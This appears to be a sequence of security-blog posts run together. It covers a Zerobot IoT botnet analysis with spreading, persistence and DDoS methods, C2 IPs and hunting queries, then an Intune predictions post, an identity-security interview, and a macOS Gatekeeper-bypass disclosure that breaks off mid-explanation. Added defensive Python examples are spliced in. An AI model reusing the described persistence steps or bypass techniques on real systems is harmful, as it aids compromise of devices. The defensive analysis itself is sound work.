Today we are updating the way Microsoft Security Update Guide (SUG) represents the Windows Hotpatch feature to make it easier for users to identify the hotpatch and security updates. Hotpatching was introduced a year ago as a new way to install updates on supported Windows Server Azure Edition virtual machines (VMs) without requiring a reboot after installation.
Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices’ configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services seized by the FBI in December 2022.
Microsoft has previously reported on the evolving threat ecosystem. The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.
In this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet’s recent analysis on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware’s reach to different types of devices. In addition to these findings, we’re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.
What is Zerobot?
Zerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.
The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.
Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.
How Zerobot gains and maintains device access
IoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.
In addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:
Vulnerability | Affected software
CVE-2017-17105 | Zivif PR115-204-P-RS
CVE-2019-10655 | Grandstream
CVE-2020-25223 | WebAdmin of Sophos SG UTM
CVE-2021-42013 | Apache
CVE-2022-31137 | Roxy-WI
CVE-2022-33891 | Apache Spark
ZSL-2022-5717 | MiniDVBLinux
Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID “ZERO-32906” for CVE-2018-20057, “GPON” for CVE-2018-10561, and “DLINK” for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.
Microsoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.
Upon gaining device access, Zerobot injects a malicious payload, which may be a generic script called zero.sh that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.
Depending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name FireWall.exe (older versions use my.exe). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.
To achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:
Desktop entry:
Zerobot copies itself to $HOME/.config/ssh.service/sshf then writes a desktop entry file called sshf.desktop to the same directory. Older Linux versions use $HOME/.config/autostart instead of $HOME/.config/ssh.service.
Daemon:
Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
Service:
Copies itself to /etc/sshf and writes a service configuration at /lib/system/system/sshf.service, then enables the service (to make sure it starts at boot) with two commands:
systemctl enable sshf
service enable sshf
All persistence mechanisms on older Linux versions use my.bin and my.bin.desktop instead of sshf and sshf.desktop.
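The persistence artifacts listed above are easy to turn into a host check. The following is an added example, not Microsoft's or the operators' code: it takes the file and directory names from the write-up (sshf, sshf.desktop, my.bin, my.bin.desktop, $HOME/.config/ssh.service, $HOME/.config/autostart, /usr/bin, /etc/init, /etc, /lib/system/system) and scans a filesystem root and home directory for them; the root/home parameters and the additional check of the standard systemd unit directory are this example's own assumptions.

```python
"""Hunt for the Linux persistence artifacts described in the Zerobot write-up.

Added example; not Microsoft's or the malware's code. Artifact names come from
the write-up. root/home are parameters so the scan can be pointed at a mounted
disk image or at a constructed test tree instead of the live host.
"""
import os
import tempfile
from dataclasses import dataclass

# Current names and the older names the write-up says they replaced.
NAME_PAIRS = (("sshf", "sshf.desktop"), ("my.bin", "my.bin.desktop"))

# Autostart directories: current build first, then the older one.
AUTOSTART_DIRS = ("ssh.service", "autostart")

# Unit directory exactly as given in the write-up, plus the standard systemd
# unit directory (assumption: a hunt should cover both).
SERVICE_DIRS = ("lib/system/system", "lib/systemd/system")


@dataclass(frozen=True)
class Finding:
    mechanism: str  # "desktop entry", "daemon" or "service"
    path: str


def find_zerobot_persistence(root: str, home: str) -> list[Finding]:
    """Return every listed persistence artifact present under root/home.

    root is the filesystem root to inspect ("/" on a live host); home is the
    absolute path of the user's home directory on that filesystem.
    """
    def rooted(*parts: str) -> str:
        return os.path.join(root, *parts)

    findings: list[Finding] = []
    for binary, desktop in NAME_PAIRS:
        # Desktop entry: binary plus .desktop file in an autostart directory.
        for autostart in AUTOSTART_DIRS:
            for name in (binary, desktop):
                path = os.path.join(home, ".config", autostart, name)
                if os.path.lexists(path):
                    findings.append(Finding("desktop entry", path))
        # Daemon: copy in /usr/bin with a config in /etc/init.
        for path in (rooted("usr", "bin", binary),
                     rooted("etc", "init", binary + ".conf")):
            if os.path.lexists(path):
                findings.append(Finding("daemon", path))
        # Service: copy in /etc with a unit file in a service directory.
        if os.path.lexists(rooted("etc", binary)):
            findings.append(Finding("service", rooted("etc", binary)))
        for service_dir in SERVICE_DIRS:
            path = rooted(*service_dir.split("/"), binary + ".service")
            if os.path.lexists(path):
                findings.append(Finding("service", path))
    return findings


def mechanisms(findings: list[Finding]) -> set[str]:
    """Distinct persistence mechanisms represented in a set of findings."""
    return {f.mechanism for f in findings}


def _touch(path: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write("constructed test artifact\n")


def demo() -> list[Finding]:
    """Build a constructed tree containing four artifacts and scan it.

    The tree is fabricated for this example; no real sample is involved.
    """
    root = tempfile.mkdtemp(prefix="zerobot-hunt-")
    home = os.path.join(root, "home", "iotuser")
    _touch(os.path.join(home, ".config", "ssh.service", "sshf"))
    _touch(os.path.join(home, ".config", "ssh.service", "sshf.desktop"))
    _touch(os.path.join(root, "etc", "init", "sshf.conf"))
    # An older-style unit file under the replaced name.
    _touch(os.path.join(root, "lib", "systemd", "system", "my.bin.service"))
    return find_zerobot_persistence(root, home)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding.mechanism:14} {finding.path}")
```

On a live host call `find_zerobot_persistence("/", os.path.expanduser("~"))` for each interactive user's home directory.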
New attack capabilities
In addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.
The following are the previously known Zerobot capabilities:
Attack method | Description
UDP_LEGIT | Sends UDP packets without data.
MC_PING | Meant for DDoS on Minecraft servers. Sends a handshake and status request.
TCP_HANDSHAKE | Floods with TCP handshakes.
TCP_SOCKET | Continuously sends random payloads on an open TCP socket. Payload length is customizable.
TLS_SOCKET | Continuously sends random payloads on an open TLS socket. Payload length is customizable.
HTTP_HANDLE | Sends HTTP GET requests using the Golang standard library.
HTTP_RAW | Formats and sends HTTP GET requests.
HTTP_BYPASS | Sends HTTP GET requests with spoofed headers.
HTTP_NULL | HTTP headers are each one random byte (not necessarily ASCII).
Previously undisclosed and new capabilities are the following:
Attack method | Description
UDP_RAW | Sends UDP packets where the payload is customizable.
ICMP_FLOOD | Supposed to be an ICMP flood, but the packet is built incorrectly.
TCP_CUSTOM | Sends TCP packets where the payload and flags are fully customizable.
TCP_SYN | Sends SYN packets.
TCP_ACK | Sends ACK packets.
TCP_SYNACK | Sends SYN-ACK packets.
TCP_XMAS | Christmas tree attack (all TCP flags are set). The reset cause field is “xmas”.
How Zerobot spreads
After persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called new_botnet_selfRepo_isHoneypot, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.
Microsoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called impst.sh:
Figure 1. The impst.sh script used to download the remote administration tool
Defending devices and networks against Zerobot
The continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:
Use security solutions with cross-domain visibility and detection capabilities like Microsoft 365 Defender, which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.
Adopt a comprehensive IoT security solution such as Microsoft Defender for IoT to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.
Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.
Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.
Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.
Harden endpoints with a comprehensive Windows security solution:
Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged solutions, enable Smart App Control.
Perform timely cleanup of all unused and stale executables sitting on your or your organization’s devices.
Detections
Microsoft Defender for IoT
Microsoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:
CVE-2014-8361
CVE-2016-20017
CVE-2017-17105
CVE-2017-17215
CVE-2018-10561
CVE-2018-20057
CVE-2019-10655
CVE-2020-7209
CVE-2020-10987
CVE-2020-25506
CVE-2021-35395
CVE-2021-36260
CVE-2021-42013
CVE-2021-46422
CVE-2022-22965
CVE-2022-25075
CVE-2022-26186
CVE-2022-26210
CVE-2022-30023
CVE-2022-30525
CVE-2022-31137
CVE-2022-33891
CVE-2022-34538
CVE-2022-37061
ZERO-36290
ZSL-2022-5717
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects the malicious files under the following platforms and threat names:
Zerobot (Win32/64 and Linux)
SparkRat (Win32/64 and Linux)
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:
DEV-1061 threat activity group detected
An active ‘PrivateLoader’ malware process was detected while executing
‘Morila’ malware was prevented
‘Multiverze’ malware was detected
Microsoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:
CVE-2022-22965 (Spring4Shell)
Microsoft Defender for Endpoint’s Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:
CVE-2014-8361
CVE-2019-10655
CVE-2020-25506
CVE-2021-36260
CVE-2021-42013
CVE-2022-30525
CVE-2022-31137
CVE-2022-37061
Devices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.
Microsoft Defender for Cloud
Microsoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:
VM_ReverseShell
VM_SuspectDownloadArtifacts
SQL.VM_ShellExternalSourceAnomaly
AppServices_CurlToDisk
Advanced hunting queries
Microsoft 365 Defender
Microsoft 365 Defender customers can run the following query to find related activity in their networks.
Zerobot files
This query finds the file hashes associated with Zerobot activity.
let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string,
ActivityGroupNames:string)[@"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv"]
with(format="csv", ignoreFirstRecord=True);
let shahashes = IoCList
| where IoC_Type =~ "sha256" and Description =~ "Dev-1061 Zerobot affecting IoT devices"
| distinct IoC;
DeviceFileEvents
| where SHA256 in (shahashes)
Zerobot HTTP requests
This query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.
This query finds incoming connections from IOCs associated with Zerobot activity.
DeviceNetworkEvents
| where RemoteIP in("176.65.137.5","176.65.137.6")
| where ActionType == "InboundConnectionAccepted"
| where Timestamp > ago(30d)
| project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy
Rotem Sde-Or, Ilana Sivan, Gil Regev (Microsoft Defender for IoT Research Team); Meitar Pinto, Nimrod Roimy, Nir Avnery (Microsoft Defender Research Team); Ramin Nafisi, Ross Bevington (Microsoft Threat Intelligence Center, MSTIC)
The end of the year typically brings with it a small library of reports with predictions for the year ahead. The value in these reports is less in the precise predictions themselves—given how interconnected the world is, no one has a perfect crystal ball. Rather, the forecasts help frame the thinking about the possibilities for the coming year, and what they might mean for you. With that in mind, I would like to share five predictions for 2023 that resonated with me and explain what they could mean for endpoint management in your organization. After reviewing these predictions, I encourage you to review your current endpoint security posture, and how Microsoft Intune can help further improve it in 2023.
1. Strong cloud adoption rates will continue
Macroeconomists may be pessimistic about gross domestic product growth in Europe and the United States in 2023, but even in weak macroeconomic scenarios, cloud growth rates remain stellar.[1] Gartner® predicts almost 30 percent growth for infrastructure as a service and almost 25 percent growth for platform as a service in 2023, as compared to 2022 in the worldwide public cloud user spending category. A September 2022 survey of chief technology officers (CTOs) by Evercore-ISI asked the top things they would do in response to reduced budgets or inflationary pressure.[2] The top answer (from 44 percent of CTOs): increase their use of the cloud. Gartner® predicts that by 2025 more than 90 percent of clients will use cloud-based unified endpoint management (UEM) tools, up from 50 percent in 2022. So, if you have not migrated your UEM to the cloud yet, 2023 is the year to start.
2. Security will remain the top issue for CTOs into 2023
When asked in September about their highest priority project (in terms of incremental spending), 42 percent of CTOs said cloud security. Network security was the second most common response, with analytics third.[2] Credit Suisse recently polled CTOs on how different categories in their IT budget would grow.[3] In 2021 and 2022, security was ranked top, with an 11 percent increase. Asked to predict the growth in security spending in 2026, security again ranked highest, but the expected increase was even more: 14 percent. Underlying factors provide color to the raw growth numbers. The geopolitical storm continues, and new avenues continue to emerge for hackers. I expect to hear even more about deepfake videos and ransomware as a service in 2023. So, how do chief information security officers (CISOs) strengthen their organization’s defenses in 2023? We would propose two initiatives: first, ensure security software is suitably integrated with a unified console to enable fewer points of vulnerability and more automation. By extension, this might mean consolidating vendors. Second, tackle the human aspect: invest in upskilling staff on how best to be aware of potential attacks.[4]
3. Worker mobility will increase further
The past few years have changed the model for knowledge workers. 2023 will see several shifts that will add to the hybrid work from anywhere (and hence, protect everywhere) trend. Next year will see mass adoption of 5G-capable devices: Juniper Research estimates that there will be 600 million more 5G connections added in 2023 alone.[5] Technological trends will be compounded by demographic trends, such as “productivity paranoia,” where workers want to show they are being productive, no matter where they are. What does this mean for CISOs? New working styles, new networks, and new devices mean new attack vectors. In 2023, be ready to protect your workers who are working from anywhere, not just from home.
4. CTOs will need to pay more attention to local factors
There is always a balance between global and local initiatives, but in 2023, we expect that it will be increasingly difficult to just adopt a one-size-fits-all global shortcut. We are seeing an increasing number of national regulations related to data sovereignty, with implications for where that data is stored and secured.[6] 2023 will see further digital transformation of public sector agencies. These agencies often have more country-specific security or compliance rules compared to their private sector counterparts. As such, CISOs need to ensure their endpoint management solutions (and, indeed, their entire technology architecture) can adapt to handle extra local requirements.
5. Truly transformative technology will rise to the top
My final prediction is that 2023 will see further clarity on the difference between genuinely transformative technology and tech that has been overhyped. One technology that I expect to compare favorably for enterprises in 2023 will be more advanced forms of automation, such as AI. AI start-ups have seen more than USD 100 billion in venture capital investment since 2020, in everything from the development of new drugs to new ways to create art and writing (and, perhaps, eventually, transform how blogs are created!).[7] Security represents a great opportunity for advanced automation and AI, given the nature of the ongoing problems CISOs must grapple with. As such, while new AI-generated images may garner the headlines, away from the limelight we expect many other enterprise software solutions to benefit from both sophisticated AI and simply greater automation.[8] For example, in endpoint management, Gartner® sees that by 2027, UEM and digital employee experience tools will converge—to drive autonomous endpoint management, reducing human effort by at least 40 percent. The more that security tasks are automated, the more time is freed up for more strategic work by your key staff.
Learn more
I hope you found these 2023 trends thought-provoking. I would encourage you to continue to think about what the macro situation might mean specifically for your organization and translate that into an action plan for your Microsoft Intune assets in 2023. In the meantime, I wish you all a safe and thoughtful holiday season and wish you continued success in the new year.
Learn more about how Microsoft Intune can simplify your endpoint management:
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Christina Richmond, a cybersecurity expert who formerly worked as a Program Vice President at IDC. The thoughts below reflect Christina’s views, not the views of her former employer or Microsoft, and are not legal advice.
Brooke: Christina, thanks for taking the time to share your extensive experience as a cybersecurity analyst and thought leader.
I’ll be asking you about topics that Microsoft customers typically consider in their end-to-end security journey, especially around the foundation of identity and access solutions as the first line of defense in a Zero Trust strategy. Here’s my first question:
What security basics should an organization build into any cloud platform for a strong security foundation?
Christina: I would expect to see a layered approach across the entire environment. Any cloud provider needs to secure their own infrastructure and extend to everything they are offering externally. In the shared responsibility model, the customer of the cloud platform needs to understand where their data is, which is their responsibility, and where the platform is being secured by the cloud provider. It’s important to see that the cloud provider’s physical infrastructure and digital assets are going through the same kind of security, layered approach, or in-depth defense that you would hope to see in any organization.
I also would want to see a cloud provider offer tools to help customers with their side of the shared responsibility model. For example, identity security is your responsibility as an organization, but a cloud provider can help by offering a strong identity and access management program. I would expect identity and data security to be very strong from a cloud provider because those are the new perimeter, and data, of course, is the lifeblood of the organization.
The other thing that I would hope for from a cloud provider is actionable insight into threat actors and the tools and tactics that they are using, plus the monitoring and response services that span a hybrid environment and multicloud environments.
Brooke: How should trust play into security decision-makers’ minds?
Christina: Trust means so many things to so many people. It’s not one thing. When I was at IDC, I defined digital trust solely in terms of security. Now, I look at it from a broader economic perspective, like how a company is transparent about how they are going to use customer data. It is about showing very high principles around their data security.
That would be evidenced by publishing what they do with your data and what choices you have as a consumer of that service. You can choose privacy and have different elections of privacy controls, so that would be transparency around data.
Digital trust involves having a very strong model of ethics around proper data usage, but also ethics more broadly in the community, so not just the data of their consumers but also the data of their partners. Digital trust also has to do with the brand. Do you feel good about a brand? If you see sustainability, strong diversity, equity, and inclusion, and they’re taking care of their organization and presenting a brand that is doing good in the community, that also builds trust.
I like it when organizations are very straightforward and transparent about what they are doing for their employees. “Here is our diversity equity inclusion framework, our mission statement, and what we are doing in the community to give back. Here is how we are being responsible partners for facial recognition, artificial intelligence, and machine learning.” I love it when there is an event in the media—it might be a negative event—and a company comes out right away and says, “This happened, and here is our stance on it” and they are very transparent.
Brooke: What are the most common gaps you are seeing for organizations when securing access?
Christina: There are a ton of gaps. Identities are really complicated. Administrators deal with so much complexity. They must look at multiple dashboards and onboard employees to work on software as a service (SaaS) platforms or cloud platforms or on-premises in their own data centers.
There is a gap in modernizing identity and having one dashboard for visibility. Visibility into apps and services that also need our access control is a huge gap. We do not know what we cannot see, and we cannot protect it if we do not see it. It is important to include those apps and services in identity lifecycle management, and it is a gap for many organizations because it is still new.
Brooke: What should organizations be doing to address the challenge of compromised passwords?
Christina: Before we talk about moving toward passwordless authentication, we need to look a little more deeply at multifactor authentication. It is important, but it is not enough. There are multiple authentication techniques, and we are used to getting a code and putting the code in. That is better than just putting a password in and having to personally manage hundreds of passwords, but there are other things that we can do to bolster multifactor authentication:
Biometrics: We can use facial recognition or a fingerprint on our computer or phone.
Time of access: Time and geolocation are coordinated.
Behavior-based security: Consider how a person holds the phone and how much they shake or move it around and tell if it is in someone else’s hands.
Hard token authentication: Users need a USB drive, keycard, RFID key fob, or another hard token to authenticate.
Passwordless: It helps slow the hacker down because it is much harder to hack. I like passwordless. I just think it still needs a little bit more maturing.
Brooke: What are your thoughts on permissions management in a risk-reduction approach?
Christina: It’s important to have permissions management. There is permission creep, and we need to keep on top of it. Having visibility across your on-premises data center, your multiple data centers, and your multiple clouds is critical.
We lack visibility into identities and permissions, and we struggle with permission creep. We need a comprehensive, unified solution for full visibility and for remediating risk that continuously monitors unused or excessive permissions and is based on least privilege. Least privilege and Zero Trust are vastly different and both are important for varied reasons. Being able to manage all those permissions in a way that provides us with broader visibility and a unified view and does constant monitoring is a critical asset. This could mean flagging that this person or this resource is no longer using their permission, or a person has too much permission based on their title or other factors.
Brooke: Thank you, Christina. I’ve got one closing question on behalf of our readers. As an expert, what do you suggest as the three most important things that organizations should implement for a strong digital identity framework?
Christina: First, identity governance with self-service onboarding is important, so more automation and fewer legacy tools. Second, we need to be moving toward passwordless authentication, and we need to make passwordless easier on the users. Third, organizations need workload identity management because the supply chain is a mess when it comes to tracking who has access to what resource, for what reason, and how broad their permissions are. We need to be able to track that in real-time and do it seamlessly with automation. Permissions management needs to be built-in, but we need to treat workloads, apps, and services as identity so that we can fold that into our permission management and our broader identity access management tools.
On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.
After carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Fixes for the vulnerability, now identified as CVE-2022-42821, were quickly released by Apple to all their OS versions. We note that Apple’s Lockdown Mode, introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.
In this blog post, we share information about Gatekeeper and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.
Unlocking the Gatekeeper security mechanism
Many macOS infections are the result of users running malware, often inadvertently. Fake app bundles might masquerade as different apps, like Flash Player, or as a legitimate file, for example by using a PDF icon and the app name “Resume”. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named com.apple.quarantine and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent sandbox escapes. In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:
If the app is validly signed and notarized, meaning approved by Apple, a prompt requires the user’s consent before it’s launched.
Otherwise, the user is informed that the app cannot be run as it’s untrusted.
Extended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the com.apple.quarantine attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:
flag;date;agent_name;UUID
Extended attributes can be viewed or modified with the xattr command line utility.
A flag value of “0083” enforces Gatekeeper restrictions on the file, as displayed below:
Figure 1. A common com.apple.quarantine extended attribute value
Figure 2. Gatekeeper blocking an untrusted downloaded file
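As an added example (not code from the original post), the following Python parses a com.apple.quarantine value into the four fields described above. The sample values are constructed; the date field is interpreted as hexadecimal seconds since the Unix epoch, and the agent name and UUID are treated as optional because writers other than Safari may leave them empty. read_quarantine() shells out to the xattr utility mentioned above and returns None when a file carries no quarantine attribute at all.

```python
from datetime import datetime, timezone
from typing import Optional
import subprocess
import uuid

# Constructed sample values (not taken from a real download).
SAMPLE_SAFARI = "0083;63a1e4c8;Safari;0F6C3B3A-8D4E-4A6B-9A3C-2F1E0D9C8B7A"
SAMPLE_NO_AGENT = "0081;63a1e4c8;;"


def parse_quarantine(value: str) -> dict:
    """Parse flag;date;agent_name;UUID. flag and date are hex; date is Unix seconds.

    Only the first two fields are required; agent name and UUID may be empty.
    """
    parts = value.strip().split(";")
    if len(parts) < 2:
        raise ValueError("expected at least flag;date")
    flags = int(parts[0], 16)
    downloaded_at = datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc)
    agent = parts[2] if len(parts) > 2 else ""
    qid = parts[3] if len(parts) > 3 else ""
    if qid:
        uuid.UUID(qid)  # raises ValueError if the identifier is malformed
    return {"flags": flags, "downloaded_at": downloaded_at, "agent": agent, "uuid": qid}


def read_quarantine(path: str) -> Optional[dict]:
    """Read the attribute from a file on macOS with the xattr utility.

    Returns None when the file has no com.apple.quarantine attribute, which is
    what a download that never received the attribute looks like.
    """
    proc = subprocess.run(["xattr", "-p", "com.apple.quarantine", path],
                          capture_output=True, text=True)
    if proc.returncode != 0:
        return None
    return parse_quarantine(proc.stdout)
```

The flags value is returned as an integer so that callers can compare it against the 0083 value shown in Figure 1 without committing to a meaning for individual bits, which Apple does not document.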
Gatekeeper plays an essential role in stopping malware on macOS and is an effective security feature. However, given the numerous bypass techniques found over the years, it is not bulletproof, and the ability to bypass it has serious implications because malware authors sometimes use such techniques for initial access.
Historical overview of Gatekeeper bypasses
Numerous Gatekeeper bypasses have been identified in the past years, some even abused by malware families such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:
Misuse the com.apple.quarantine extended attribute assignment.
Find a vulnerability in the components that enforce policy checks on quarantined files.
Two cases that we don’t consider to constitute a “true” Gatekeeper bypass are:
Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.
MITRE’s definition of “Gatekeeper Bypass” (T1553.001), which requires code execution to forcefully modify or remove the com.apple.quarantine extended attribute.
Here are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:
Paths longer than 886 characters were not assigned extended attributes, so an app residing in such a path escaped quarantine. Because symbolic links are never assigned the quarantine attribute either, a symbolic link pointing to that app could be run directly, completely bypassing Gatekeeper, as outlined here.
App bundles with a missing Info.plist and a shell script as the main executable were treated incorrectly by syspolicyd, the component that enforces policy restrictions on apps. Writeups can be found here and here.
A bug in the way syspolicyd interpreted files with a “shebang” (#!) header caused it to consider the app bundle safe, as detailed here.
Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented here.
Quarantine attributes are not checked for JAR files, which are run by Java, as summarized here.
Metadata persistence over AppleDouble
Intrigued by CVE-2021-1810, one of the archive-based bypasses listed above, we wondered what other mechanism could be leveraged in archives. Considering that symbolic links are preserved in archives and aren’t assigned quarantine attributes, we looked for a mechanism that could persist other kinds of metadata through archives.
After some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.
Even though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, back in 1994, Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there’s only a “single” file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a “._” prefix.
Interestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.
The AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository, in the file that handles extended attributes, which also includes an ASCII-art depiction of the format. To demonstrate the AppleDouble file contents, we used the ditto utility as follows:
Figure 3. AppleDouble file created as “._somefile”
When the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:
